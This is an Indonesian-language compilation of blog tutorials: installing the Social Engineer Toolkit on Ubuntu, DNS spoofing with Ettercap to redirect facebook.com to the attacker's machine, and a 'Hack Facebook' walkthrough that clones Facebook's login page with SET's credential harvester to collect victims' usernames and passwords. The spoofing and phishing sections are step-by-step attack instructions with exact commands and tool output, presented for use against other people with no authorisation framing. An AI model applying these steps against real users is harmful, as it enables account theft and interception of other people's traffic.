CARA: Se-toolkit pada Ubuntu Desktop 12.04 LTS

The Social Engineer Toolkit (SET) diciptakan dan ditulis oleh pendiri TrustedSec. Ini adalah alat Python berbasis open-source yang ditujukan untuk pengujian penetrasi sekitar Sosial-Engineering.

Langkah 1:

sudo apt-get install git

sudo-Sh
cd / opt
git clone https://github.com/trustedsec/social-engineer-toolkit/ set /
cd / opt / set
python setup.py install

Langkah 2:

Untuk menjalankannya. Anda dapat menjalankannya pada direktori manapun.

sudo-Sh
se-toolkit

Itu saja! Sampai jumpa.

DNS Spoofing Dengan Ettercap

DNS Spoofing Dengan Ettercap

apa sih DNS spoofing???
     DNS spoofing adalah salah satu metode hacking Man In The Middle Attack (MITM). Hampir sama konsepnya dengan ARP Spoofing, tapi yang membedakan adalah Attacker akan memalsukan alamat IP dari sebuah domain, ketika target melakukan request terhadap sebuah alamat domain dengan alamat IP A, dengan DNS Spoofing, oleh gateway request user tersebut akan di forward ke alamat IP palsu dari attacker. jadi intinya DNS spoofing itu bisa nmengalihkan request dari seseorang ke alamat yang di inginkan oleh penyerang.

1. edit etter.dns di directory /usr/local/share/ettercap dengan perintah

    gedit /usr/local/share/ettercap/etter.dns

Tambahin:

facebook.com A ip anda 

www.facebook.com A ip anda

ganti yang di garis bawahi dengan kebutuhan anda :) (cari IP di ifconfig)

2. Jalanin ettercapnya

ettercap -T -q -i wlan0 -P dns_spoof -M arp // //

Selesai jika orang membuka facebook maka akan di alihkan ke kita :)

Selamat Mencoba :)

sumber http://linuxidn.blogspot.com/2013/06/dns-spoofing-dengan-ettercap.html

Hack Facebook dengan S.E.T di Ubuntu

Ok langsung saja kita mulai

Download S.E.T dulu
git clone https://github.com/trustedsec/social-engineer-toolkit/ set/

Install dengan perintah

cd /set 

./setup.py install

     Bila tidak bisa menginstall S.E.T tambahkan repository BackTrack di Ubuntu kalo belum tau caranya baca artikel saya sebelumnya Repository BackTrack di Ubuntu

Sekarang saatnya memulai Hacking

1. Matikan dulu Apache anda dengan perintah

   service apache2 stop
   atau
   sudo /etc/init.d/apache2 stop

    Untuk memulai kembali masukan perintah

   service apache2 start

   Untuk melihat status apache masukan perintah
   sevice apahe2 status

2.Buka S.E.T dengan perintah

   cd /pentest/exploits/set

   ./set

3.pilih Social-Engineering Attacks dengan cara tekan angka 1 (enter)

4.pilih Website Attack Vectors tekan 2 (enter)

5.pilih Credential Harvester Attack Method tekan 3 (enter)

6.pilih Web Templates tekan 1 (enter)

7.IP address for the POST back in Harvester/Tabnabbing: 192.168.1.34 (IP address kita)


     Jika memilih Site Cloner kita perlu memasukan alamat web yang akan kita buat menjadi fake login, dan jika web templates kita tinggal memilih yang sudah disediakan oleh SET itu sendiri, facebook,gmail,google,twitter dan Java required contohnya.

8. tinggal pilih templatenya, karena ini tutorial hack facebook, pilih 4


[*] Cloning the website: http://www.facebook.com

[*] This could take a little bit...


The best way to use this attack is if username and password form

fields are available. Regardless, this captures all POSTs on a website.

[*] I have read the above message. [*]



9. Press {return} to continue. tekan enter.


[*] Social-Engineer Toolkit Credential Harvester Attack

[*] Credential Harvester is running on port 80

[*] Information will be displayed to you as it arrives below:


     Kalau sudah muncul kalimat seperti yang di atas berarti S.E.T telah berjalan jangan di tutup terminalnya tunggu aja sampai ada orang yang login di fake Facebook yang udah kita buat tadi.
Untuk menutup SET tekan ctrl+C

username dan password akan muncul di bawah kalimat tersebut.     Agar orang-orang kalau membuka facebook di alihkan ke fake Facebook gunakan DSN spoofing.
Belum bisa DNS spoofing baca

sumber http://linuxidn.blogspot.com/2013/06/hack-facebook-dengan-set-di-ubuntu.html